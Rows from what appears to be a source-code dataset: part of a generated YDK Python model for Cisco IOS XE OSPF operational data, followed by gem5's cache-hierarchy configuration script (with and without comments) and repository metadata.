[('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])), ('dead_timer', (YLeaf(YType.uint32, 'dead-timer'), ['int'])), ]) self.nbr_id = None self.address = None self.dr = None self.bdr = None self.dr_ip = None self.bdr_ip = None self.event_count = None self.retrans_count = None self.state = None self.dead_timer = None self._segment_path = lambda: "ospfv2-neighbor" + "[nbr-id='" + str(self.nbr_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, ['nbr_id', 'address', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'event_count', 'retrans_count', 'state', 'dead_timer'], name, value) class Ospfv2LsdbExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, self).__init__() self.yang_name = "ospfv2-lsdb-external" self.yang_parent_name = "ospfv2-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','lsa_id','advertising_router'] self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])), ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])), ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])), ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])), ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])), ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])), ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])), ]) self.lsa_type = None self.lsa_id = None self.advertising_router = None self.lsa_age = None self.lsa_options = Bits() self.lsa_seq_number = None self.lsa_checksum = None self.lsa_length = None self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa() self.unsupported_lsa.parent = self self._children_name_map["unsupported_lsa"] = "unsupported-lsa" self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa() self.router_lsa.parent = self self._children_name_map["router_lsa"] = "router-lsa" self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa() self.network_lsa.parent = self self._children_name_map["network_lsa"] = "network-lsa" self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa() self.network_summary_lsa.parent = self self._children_name_map["network_summary_lsa"] = "network-summary-lsa" self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa() self.router_summary_lsa.parent = self self._children_name_map["router_summary_lsa"] = "router-summary-lsa" self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa() self.external_lsa.parent = self self._children_name_map["external_lsa"] = "external-lsa" self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa() self.nssa_lsa.parent = self self._children_name_map["nssa_lsa"] = "nssa-lsa" self.ospfv2_router_lsa_links = YList(self) self._segment_path = lambda: "ospfv2-lsdb-external" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value) class Ospfv2RouterLsaLinks(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, self).__init__() self.yang_name = "ospfv2-router-lsa-links" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_type','link_id','link_data'] self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo))]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ]) self.link_type = None self.link_id = None self.link_data = None self.link_topo = YList(self) self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value) class LinkTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, self).__init__() self.yang_name = "link-topo" self.yang_parent_name = "ospfv2-router-lsa-links" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "link-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value) class UnsupportedLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, self).__init__() self.yang_name = "unsupported-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])), ]) self.lsa_data = [] self._segment_path = lambda: "unsupported-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, ['lsa_data'], name, value) class RouterLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, self).__init__() self.yang_name = "router-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])), ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])), ]) self.router_lsa_bits = Bits() self.router_lsa_number_links = None self._segment_path = lambda: "router-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value) class NetworkLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, self).__init__() self.yang_name = "network-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])), ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])), ]) self.network_lsa_mask = None self.network_attached_routers = [] self._segment_path = lambda: "network-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value) class NetworkSummaryLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, self).__init__() self.yang_name = "network-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "network-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "network-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class RouterSummaryLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, self).__init__() self.yang_name = "router-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "router-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "router-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class ExternalLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, self).__init__() self.yang_name = "external-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "external-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "external-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class NssaLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, self).__init__() self.yang_name = "nssa-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "nssa-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "nssa-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) def clone_ptr(self): self._top_entity = OspfOperData() return self._top_entity
true
true
f705ab09a5963cd25258cf441567b8cdaf1b0983
10,096
py
Python
configs/common/CacheConfig.py
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
[ "BSD-3-Clause" ]
3
2019-07-19T22:52:27.000Z
2020-05-26T04:37:46.000Z
configs/common/CacheConfig.py
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
[ "BSD-3-Clause" ]
1
2019-07-22T16:41:56.000Z
2019-07-22T16:41:56.000Z
configs/common/CacheConfig.py
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
[ "BSD-3-Clause" ]
2
2019-06-26T14:33:42.000Z
2019-10-02T02:09:23.000Z
# Copyright (c) 2012-2013, 2015-2016 ARM Limited # All rights reserved # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Copyright (c) 2010 Advanced Micro Devices, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Lisa Hsu # Configure the M5 cache hierarchy config in one place # from __future__ import print_function from __future__ import absolute_import import m5 from m5.objects import * from .Caches import * from . import HWPConfig def config_cache(options, system): if options.external_memory_system and (options.caches or options.l2cache): print("External caches and internal caches are exclusive options.\n") sys.exit(1) if options.external_memory_system: ExternalCache = ExternalCacheFactory(options.external_memory_system) if options.cpu_type == "O3_ARM_v7a_3": try: import cores.arm.O3_ARM_v7a as core except: print("O3_ARM_v7a_3 is unavailable. Did you compile the O3 model?") sys.exit(1) dcache_class, icache_class, l2_cache_class, walk_cache_class = \ core.O3_ARM_v7a_DCache, core.O3_ARM_v7a_ICache, \ core.O3_ARM_v7aL2, \ core.O3_ARM_v7aWalkCache elif options.cpu_type == "HPI": try: import cores.arm.HPI as core except: print("HPI is unavailable.") sys.exit(1) dcache_class, icache_class, l2_cache_class, walk_cache_class = \ core.HPI_DCache, core.HPI_ICache, core.HPI_L2, core.HPI_WalkCache else: dcache_class, icache_class, l2_cache_class, walk_cache_class = \ L1_DCache, L1_ICache, L2Cache, None if buildEnv['TARGET_ISA'] == 'x86': walk_cache_class = PageTableWalkerCache # Set the cache line size of the system system.cache_line_size = options.cacheline_size # If elastic trace generation is enabled, make sure the memory system is # minimal so that compute delays do not include memory access latencies. # Configure the compulsory L1 caches for the O3CPU, do not configure # any more caches. if options.l2cache and options.elastic_trace_en: fatal("When elastic trace is enabled, do not configure L2 caches.") if options.l2cache: # Provide a clock for the L2 and the L1-to-L2 bus here as they # are not connected using addTwoLevelCacheHierarchy. Use the # same clock as the CPUs. system.l2 = l2_cache_class(clk_domain=system.cpu_clk_domain, size=options.l2_size, assoc=options.l2_assoc) system.tol2bus = L2XBar(clk_domain = system.cpu_clk_domain) system.l2.cpu_side = system.tol2bus.master system.l2.mem_side = system.membus.slave if options.l2_hwp_type: hwpClass = HWPConfig.get(options.l2_hwp_type) if system.l2.prefetcher != "Null": print("Warning: l2-hwp-type is set (", hwpClass, "), but", "the current l2 has a default Hardware Prefetcher", "of type", type(system.l2.prefetcher), ", using the", "specified by the flag option.") system.l2.prefetcher = hwpClass() if options.memchecker: system.memchecker = MemChecker() for i in range(options.num_cpus): if options.caches: icache = icache_class(size=options.l1i_size, assoc=options.l1i_assoc) dcache = dcache_class(size=options.l1d_size, assoc=options.l1d_assoc) # If we have a walker cache specified, instantiate two # instances here if walk_cache_class: iwalkcache = walk_cache_class() dwalkcache = walk_cache_class() else: iwalkcache = None dwalkcache = None if options.memchecker: dcache_mon = MemCheckerMonitor(warn_only=True) dcache_real = dcache # Do not pass the memchecker into the constructor of # MemCheckerMonitor, as it would create a copy; we require # exactly one MemChecker instance. dcache_mon.memchecker = system.memchecker # Connect monitor dcache_mon.mem_side = dcache.cpu_side # Let CPU connect to monitors dcache = dcache_mon if options.l1d_hwp_type: hwpClass = HWPConfig.get(options.l1d_hwp_type) if dcache.prefetcher != m5.params.NULL: print("Warning: l1d-hwp-type is set (", hwpClass, "), but", "the current l1d has a default Hardware Prefetcher", "of type", type(dcache.prefetcher), ", using the", "specified by the flag option.") dcache.prefetcher = hwpClass() if options.l1i_hwp_type: hwpClass = HWPConfig.get(options.l1i_hwp_type) if icache.prefetcher != m5.params.NULL: print("Warning: l1i-hwp-type is set (", hwpClass, "), but", "the current l1i has a default Hardware Prefetcher", "of type", type(icache.prefetcher), ", using the", "specified by the flag option.") icache.prefetcher = hwpClass() # When connecting the caches, the clock is also inherited # from the CPU in question system.cpu[i].addPrivateSplitL1Caches(icache, dcache, iwalkcache, dwalkcache) if options.memchecker: # The mem_side ports of the caches haven't been connected yet. # Make sure connectAllPorts connects the right objects. system.cpu[i].dcache = dcache_real system.cpu[i].dcache_mon = dcache_mon elif options.external_memory_system: # These port names are presented to whatever 'external' system # gem5 is connecting to. Its configuration will likely depend # on these names. For simplicity, we would advise configuring # it to use this naming scheme; if this isn't possible, change # the names below. if buildEnv['TARGET_ISA'] in ['x86', 'arm']: system.cpu[i].addPrivateSplitL1Caches( ExternalCache("cpu%d.icache" % i), ExternalCache("cpu%d.dcache" % i), ExternalCache("cpu%d.itb_walker_cache" % i), ExternalCache("cpu%d.dtb_walker_cache" % i)) else: system.cpu[i].addPrivateSplitL1Caches( ExternalCache("cpu%d.icache" % i), ExternalCache("cpu%d.dcache" % i)) system.cpu[i].createInterruptController() if options.l2cache: system.cpu[i].connectAllPorts(system.tol2bus, system.membus) elif options.external_memory_system: system.cpu[i].connectUncachedPorts(system.membus) else: system.cpu[i].connectAllPorts(system.membus) return system # ExternalSlave provides a "port", but when that port connects to a cache, # the connecting CPU SimObject wants to refer to its "cpu_side". # The 'ExternalCache' class provides this adaptation by rewriting the name, # eliminating distracting changes elsewhere in the config code. class ExternalCache(ExternalSlave): def __getattr__(cls, attr): if (attr == "cpu_side"): attr = "port" return super(ExternalSlave, cls).__getattr__(attr) def __setattr__(cls, attr, value): if (attr == "cpu_side"): attr = "port" return super(ExternalSlave, cls).__setattr__(attr, value) def ExternalCacheFactory(port_type): def make(name): return ExternalCache(port_data=name, port_type=port_type, addr_ranges=[AllMemory]) return make
44.475771
79
0.639758
from __future__ import print_function from __future__ import absolute_import import m5 from m5.objects import * from .Caches import * from . import HWPConfig def config_cache(options, system): if options.external_memory_system and (options.caches or options.l2cache): print("External caches and internal caches are exclusive options.\n") sys.exit(1) if options.external_memory_system: ExternalCache = ExternalCacheFactory(options.external_memory_system) if options.cpu_type == "O3_ARM_v7a_3": try: import cores.arm.O3_ARM_v7a as core except: print("O3_ARM_v7a_3 is unavailable. Did you compile the O3 model?") sys.exit(1) dcache_class, icache_class, l2_cache_class, walk_cache_class = \ core.O3_ARM_v7a_DCache, core.O3_ARM_v7a_ICache, \ core.O3_ARM_v7aL2, \ core.O3_ARM_v7aWalkCache elif options.cpu_type == "HPI": try: import cores.arm.HPI as core except: print("HPI is unavailable.") sys.exit(1) dcache_class, icache_class, l2_cache_class, walk_cache_class = \ core.HPI_DCache, core.HPI_ICache, core.HPI_L2, core.HPI_WalkCache else: dcache_class, icache_class, l2_cache_class, walk_cache_class = \ L1_DCache, L1_ICache, L2Cache, None if buildEnv['TARGET_ISA'] == 'x86': walk_cache_class = PageTableWalkerCache system.cache_line_size = options.cacheline_size if options.l2cache and options.elastic_trace_en: fatal("When elastic trace is enabled, do not configure L2 caches.") if options.l2cache: system.l2 = l2_cache_class(clk_domain=system.cpu_clk_domain, size=options.l2_size, assoc=options.l2_assoc) system.tol2bus = L2XBar(clk_domain = system.cpu_clk_domain) system.l2.cpu_side = system.tol2bus.master system.l2.mem_side = system.membus.slave if options.l2_hwp_type: hwpClass = HWPConfig.get(options.l2_hwp_type) if system.l2.prefetcher != "Null": print("Warning: l2-hwp-type is set (", hwpClass, "), but", "the current l2 has a default Hardware Prefetcher", "of type", type(system.l2.prefetcher), ", using the", "specified by the flag option.") system.l2.prefetcher = hwpClass() if options.memchecker: system.memchecker = MemChecker() for i in range(options.num_cpus): if options.caches: icache = icache_class(size=options.l1i_size, assoc=options.l1i_assoc) dcache = dcache_class(size=options.l1d_size, assoc=options.l1d_assoc) if walk_cache_class: iwalkcache = walk_cache_class() dwalkcache = walk_cache_class() else: iwalkcache = None dwalkcache = None if options.memchecker: dcache_mon = MemCheckerMonitor(warn_only=True) dcache_real = dcache dcache_mon.memchecker = system.memchecker dcache_mon.mem_side = dcache.cpu_side dcache = dcache_mon if options.l1d_hwp_type: hwpClass = HWPConfig.get(options.l1d_hwp_type) if dcache.prefetcher != m5.params.NULL: print("Warning: l1d-hwp-type is set (", hwpClass, "), but", "the current l1d has a default Hardware Prefetcher", "of type", type(dcache.prefetcher), ", using the", "specified by the flag option.") dcache.prefetcher = hwpClass() if options.l1i_hwp_type: hwpClass = HWPConfig.get(options.l1i_hwp_type) if icache.prefetcher != m5.params.NULL: print("Warning: l1i-hwp-type is set (", hwpClass, "), but", "the current l1i has a default Hardware Prefetcher", "of type", type(icache.prefetcher), ", using the", "specified by the flag option.") icache.prefetcher = hwpClass() system.cpu[i].addPrivateSplitL1Caches(icache, dcache, iwalkcache, dwalkcache) if options.memchecker: # Make sure connectAllPorts connects the right objects. system.cpu[i].dcache = dcache_real system.cpu[i].dcache_mon = dcache_mon elif options.external_memory_system: # These port names are presented to whatever 'external' system # gem5 is connecting to. Its configuration will likely depend # on these names. For simplicity, we would advise configuring # it to use this naming scheme; if this isn't possible, change if buildEnv['TARGET_ISA'] in ['x86', 'arm']: system.cpu[i].addPrivateSplitL1Caches( ExternalCache("cpu%d.icache" % i), ExternalCache("cpu%d.dcache" % i), ExternalCache("cpu%d.itb_walker_cache" % i), ExternalCache("cpu%d.dtb_walker_cache" % i)) else: system.cpu[i].addPrivateSplitL1Caches( ExternalCache("cpu%d.icache" % i), ExternalCache("cpu%d.dcache" % i)) system.cpu[i].createInterruptController() if options.l2cache: system.cpu[i].connectAllPorts(system.tol2bus, system.membus) elif options.external_memory_system: system.cpu[i].connectUncachedPorts(system.membus) else: system.cpu[i].connectAllPorts(system.membus) return system class ExternalCache(ExternalSlave): def __getattr__(cls, attr): if (attr == "cpu_side"): attr = "port" return super(ExternalSlave, cls).__getattr__(attr) def __setattr__(cls, attr, value): if (attr == "cpu_side"): attr = "port" return super(ExternalSlave, cls).__setattr__(attr, value) def ExternalCacheFactory(port_type): def make(name): return ExternalCache(port_data=name, port_type=port_type, addr_ranges=[AllMemory]) return make
true
true
f705ab4544bccecfcecc8f47c620ff3d110450c3
4,475
py
Python
users/user_forms.py
dennisfarmer/texas-hospital-hackathon
dabf80a2c3d78d595280d4ff9475176da4848349
[ "MIT" ]
null
null
null
users/user_forms.py
dennisfarmer/texas-hospital-hackathon
dabf80a2c3d78d595280d4ff9475176da4848349
[ "MIT" ]
null
null
null
users/user_forms.py
dennisfarmer/texas-hospital-hackathon
dabf80a2c3d78d595280d4ff9475176da4848349
[ "MIT" ]
null
null
null
